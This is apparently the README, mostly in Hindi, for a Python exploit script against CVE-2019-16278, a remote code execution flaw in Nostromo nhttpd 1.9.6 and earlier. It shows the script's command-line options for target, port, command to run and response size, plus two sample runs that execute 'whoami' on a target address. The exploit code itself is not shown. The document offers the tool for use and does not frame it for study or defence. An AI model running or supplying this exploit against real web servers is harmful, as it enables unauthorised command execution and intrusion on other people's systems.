
Nostromo nhttpd <= 1.9.6 में RCE का शोषण करने के लिए Python स्क्रिप्ट।
Nostromo nhttpd <= 1.9.6 में RCE का शोषण करने के लिए Python स्क्रिप्ट।
usage: CVE-2019-16278.py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-b BYTES]
Exploit for CVE-2019-16278 - Nostromo 1.9.6 RCE
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Remote host to target
-p PORT, --port PORT Remote port to target
-c COMMAND, --command COMMAND
Command to execute on the server
-b BYTES, --bytes BYTES
The number of bytes to receive back in the response
एक्सप्लॉइट चलाएँ
python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami
एक्सप्लॉइट चलाएँ और प्रतिक्रिया में अधिक बाइट्स प्राप्त करें
python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami -b 4096